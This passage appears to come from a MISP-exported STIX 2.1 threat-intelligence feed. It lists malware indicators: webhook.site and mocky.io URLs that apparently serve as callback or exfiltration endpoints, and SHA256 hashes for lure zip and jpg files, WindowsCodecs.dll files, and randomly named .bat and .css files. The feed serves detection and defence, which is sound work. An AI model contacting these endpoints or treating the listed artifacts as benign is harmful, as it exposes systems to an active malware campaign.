"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--0515787f-aa33-4099-9c69-fa76b3cf5ecd",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=1658772a-4de8-4368-a604-980c90b0a1ed']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--55bdfb1f-0650-4312-9f89-785d6dcc4eec",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/1658772a-4de8-4368-a604-980c90b0a1ed']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--529af1e0-a4c6-4d7f-8db9-e15c262130a4",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/4fe5885c-f2f6-4905-8bc7-aef1a046a134']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b73b5534-0ebb-4516-a112-263e3f9e8b71",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/0d2dc90e-2d5e-49f8-8249-d7ab955c387a']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--8fc240e5-c496-4027-b9ce-2bf83632f084",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:01:42.000Z",
"modified": "2024-05-08T16:01:42.000Z",
"pattern": "[file:hashes.SHA256 = '2bd9591bea6b1f4128e4819e3888b45b193d5a2722672b839ad7ae120bf9af3d' AND file:name = 'IMG-1030873974629655576.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:01:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e02fd994-a773-46cd-ad55-c1cc542c9861",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:02:28.000Z",
"modified": "2024-05-08T16:02:28.000Z",
"pattern": "[file:hashes.SHA256 = '52b8bfbd9ef8ecfd54e71c74a7131cb7b3cc61ea01bc6ce17cbe7aef14acc948' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:02:28Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--4b228653-3eef-4646-b8ff-76d6c1bfeb32",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:02:43.000Z",
"modified": "2024-05-08T16:02:43.000Z",
"pattern": "[file:hashes.SHA256 = '4001498463dc8f8010ef1cc803b67ac434ff26d67d132933a187697aa2e88ef1' AND file:name = 'bcpcn.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:02:43Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a5bf9b3e-3b08-4e06-b2b4-585239b73b05",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:03:00.000Z",
"modified": "2024-05-08T16:03:00.000Z",
"pattern": "[file:hashes.SHA256 = '158d49cce44968ddd028b1ef5ebc2a5183a31f05707f9dc699f0c47741be84db' AND file:name = 'IMG-1030873974629655576.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:03:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a29f2969-d1e9-4b3f-a96b-5c1a8348a7f3",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:03:19.000Z",
"modified": "2024-05-08T16:03:19.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'kpqsklcrdsonoknaote.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:03:19Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3766bd1a-2bef-493b-bd2e-a73a914e4b54",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:03:41.000Z",
"modified": "2024-05-08T16:03:41.000Z",
"pattern": "[file:hashes.SHA256 = '7c6689f591ce2ccd6713df62d5135820f94bdbf2e035ab70e6b3c6746865a898' AND file:name = 'IMG-7214532.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:03:41Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--82038fdd-a441-4c72-a1da-f101ded09359",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:04:11.000Z",
"modified": "2024-05-08T16:04:11.000Z",
"pattern": "[file:hashes.SHA256 = 'c968f9dd1f16a435901d2b93a028a0ae2508e943c8f480935a529826deb3dbeb' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:04:11Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d58f687b-98d0-460f-a87d-2d45b7fbcaa9",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:04:26.000Z",
"modified": "2024-05-08T16:04:26.000Z",
"pattern": "[file:hashes.SHA256 = '34cabc0ff2f216830ffe217e8f8d0fa4b7d3a167576745aba48b7e62f546207b' AND file:name = 'zdesdyf.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:04:26Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--2a5ee9a3-916c-4992-ab21-033dd67b6833",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:05:17.000Z",
"modified": "2024-05-08T16:05:17.000Z",
"pattern": "[file:hashes.SHA256 = 'e1069c8677d64226f7881e8504ed7a13f79f43f143842ea6c1c8b2cc680ed6c2' AND file:name = 'IMG-238279780.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:05:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d092b3d7-6adf-4a2e-973c-0e17a5c4d4cc",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:05:42.000Z",
"modified": "2024-05-08T16:05:42.000Z",
"pattern": "[file:hashes.SHA256 = '43ff178e428373512b83f85db32f364fc19c9a4ac7317835bd5089915b8727b5' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:05:42Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--50ff16f1-a066-4a6c-8497-212e69bc2d18",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:05:59.000Z",
"modified": "2024-05-08T16:05:59.000Z",
"pattern": "[file:hashes.SHA256 = 'ca700d44db08ad2ebd52278a3b303f8c13e44847a507fb317ea5dfb6cc924a76' AND file:name = 'hjpxswjdkayzwfphx.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:05:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--aaf5a34f-eebc-41f2-8abd-b7286c0ba236",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:06:22.000Z",
"modified": "2024-05-08T16:06:22.000Z",
"pattern": "[file:hashes.SHA256 = 'bab7e81395e1e9ee1680c3bb702c44b1b13ee5e67fa893d765284ae168de8369' AND file:name = 'IMG-238279780.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:06:22Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--759bb98f-4791-4ef8-bbee-c0ad4df19e01",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:06:53.000Z",
"modified": "2024-05-08T16:06:53.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'vngradn.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:06:53Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ef6ba0b7-6e5e-4df8-aee7-7c857a1f3f8b",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:07:14.000Z",
"modified": "2024-05-08T16:07:14.000Z",
"pattern": "[file:hashes.SHA256 = '38ae06833528db02cb3a315d96ad2a664b732b5620675028a8c5e059e820514f' AND file:name = 'IMG-810629002957075004.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:07:14Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--e03676a9-bcba-4136-a229-40ef123c6564",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:07:31.000Z",
"modified": "2024-05-08T16:07:31.000Z",
"pattern": "[file:hashes.SHA256 = 'ee433ddd5988ab7325b92378c6d3cb736ddb7f1bad75b939e8c931f417660129' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:07:31Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--1e584f6d-896b-4b68-81c3-29f18dc32a5a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:07:46.000Z",
"modified": "2024-05-08T16:07:46.000Z",
"pattern": "[file:hashes.SHA256 = '9ddf5561562a62961a6fcac1dc49633cb79f5d3c8cc9b95fd9f87e7be70d2d35' AND file:name = 'yvrlqpkgngppjp.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:07:46Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--4506ab04-f5a2-403f-8ca2-c043ed14869d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:08:00.000Z",
"modified": "2024-05-08T16:08:00.000Z",
"pattern": "[file:hashes.SHA256 = 'dfd1f3229f903887f2474f361a26273dc63a6221883e86c5eea2dec9521dc081' AND file:name = 'IMG-810629002957075004.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:08:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3fef157a-3ec0-488f-b19e-c5c8a976b1f8",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:08:21.000Z",
"modified": "2024-05-08T16:08:21.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'ovhupm.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:08:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5f90086f-8e2b-43c3-879d-002820a9a6ee",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:09:28.000Z",
"modified": "2024-05-08T16:09:28.000Z",
"pattern": "[file:hashes.SHA256 = '949b0bd52a4ed47bc4a342e5a29bff2bcdb0169d2fbf0f052509b65229e19b6e' AND file:name = 'IMG-368912.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:09:28Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3283e384-fb80-405a-bac8-93d414a7f13d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:10:13.000Z",
"modified": "2024-05-08T16:10:13.000Z",
"pattern": "[file:hashes.SHA256 = '642315d3091a3dfba6c0ed06f119fc40d21f3d84574b53e045baf8910e1fb38c' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:10:13Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ac3a0e68-fa29-443c-81b6-46f75050691d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:10:33.000Z",
"modified": "2024-05-08T16:10:33.000Z",
"pattern": "[file:hashes.SHA256 = 'fb42a4e0f2dd293fd6e7acb8d67d67698a0ae7685bc5462685acf4c2f73d0b44' AND file:name = 'udkozfnsljmbpjs.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:10:33Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9d3bab3c-cc97-483a-8589-197fe2b4748b",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:10:46.000Z",
"modified": "2024-05-08T16:10:46.000Z",
"pattern": "[file:hashes.SHA256 = '07e539373177801e3fc5427bf691c0315a23b527d39e756daad6a9fc48e846bc' AND file:name = 'IMG-368912.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:10:46Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9207ec19-9539-44c8-979f-bc9823719f8f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:11:32.000Z",
"modified": "2024-05-08T16:11:32.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'wrkybdizscvb.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:11:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--452bf54b-7705-4904-ae1e-de8956d2dcbd",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:13:10.000Z",
"modified": "2024-05-08T16:13:10.000Z",
"pattern": "[file:hashes.SHA256 = '5d2675572e092ba9aece8c8d0b9404b3adbd27db1312cd659ba561b86301fe73' AND file:name = 'IMG-451458326.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:13:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f63530e6-b96e-4281-8e2e-a1d7e82f3f52",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:14:15.000Z",
"modified": "2024-05-08T16:14:15.000Z",
"pattern": "[file:hashes.SHA256 = 'f348a0349fdec136c3ac9eaee9b8761da6bd33df82056e4dd792192731675b00' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:14:15Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ddb9803a-4f2f-41fd-8600-0fd56884423a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:14:32.000Z",
"modified": "2024-05-08T16:14:32.000Z",
"pattern": "[file:hashes.SHA256 = '351f10d7df282afed4558d765aa5018af0711fa4f37fa7eb82716313f4848a2f' AND file:name = 'illgvjrfyevoqxk.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:14:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--292ce6ae-7b5f-4b37-a2ac-e23847020f54",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:15:20.000Z",
"modified": "2024-05-08T16:15:20.000Z",
"pattern": "[file:hashes.SHA256 = '85f10d3df079b4db3a83ae3c4620c58a8362df2be449f8ce830d087ab41c7a52' AND file:name = 'IMG-451458326.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:15:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ea8a8fa8-bc27-4dd6-8d11-2ed614c079b0",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:15:39.000Z",
"modified": "2024-05-08T16:15:39.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'mzmtfylpywlyurkcd.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:15:39Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--771fc0bc-0722-4fde-8fa4-0119dc11f39d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:16:17.000Z",
"modified": "2024-05-08T16:16:17.000Z",
"pattern": "[file:hashes.SHA256 = '745cfce3e0242d0d5f6765b1f74608e9086d7793b45dbd1747f2d2778dec6587' AND file:name = 'IMG-0601181.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:16:17Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f9ce542f-76a9-4733-96ad-e0337b8084da",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:16:52.000Z",
"modified": "2024-05-08T16:16:52.000Z",
"pattern": "[file:hashes.SHA256 = '598a8b918d0d2908a756475aee1e9ffaa57b110d8519014a075668b8b1182990' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:16:52Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d4434be0-d0bf-4494-a050-5163e1a00501",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:17:37.000Z",
"modified": "2024-05-08T16:17:37.000Z",
"pattern": "[file:hashes.SHA256 = 'ef67f20ff9184cab46408b27eaf12a5941c9f130be49f1c6ac421b546dac2bac' AND file:name = 'hzjtajjklr.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:17:37Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d469acd5-a763-4815-910f-e281b8703d42",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:18:00.000Z",
"modified": "2024-05-08T16:18:00.000Z",
"pattern": "[file:hashes.SHA256 = '96766dfbf6c661ee3e9f750696803824a04e58402c66f208835a7acebfab1cfc' AND file:name = 'IMG-0601181.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:18:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b6711c34-69d4-45d7-8af0-1fa3a6cd3450",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:18:25.000Z",
"modified": "2024-05-08T16:18:25.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'daukbpnawvkfcjcfzu.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:18:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--831cd969-7ac2-4c31-98b2-1df34dc9440c",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:18:50.000Z",
"modified": "2024-05-08T16:18:50.000Z",
"pattern": "[file:hashes.SHA256 = '4f0f9a2076b0fd14124bed08f5fc939bada528e7a8163912a4ad1ec7687029a3' AND file:name = 'IMG-89848928.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:18:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--21f77deb-4015-4375-8f95-068e49df10f9",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:19:18.000Z",
"modified": "2024-05-08T16:19:18.000Z",
"pattern": "[file:hashes.SHA256 = 'ae4e94c5027998f4ce17343e50b935f448e099a89266f9564bd53a069da2ca9a' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:19:18Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--667464be-8206-4e37-859f-adda50016e83",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:19:43.000Z",
"modified": "2024-05-08T16:19:43.000Z",
"pattern": "[file:hashes.SHA256 = 'd714fff643d53fdd56cf9dcb3bd265e1920c4b5f34a4668b584a0619703d8a3e' AND file:name = 'jxfgibtfxiewsdvmeg.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:19:43Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
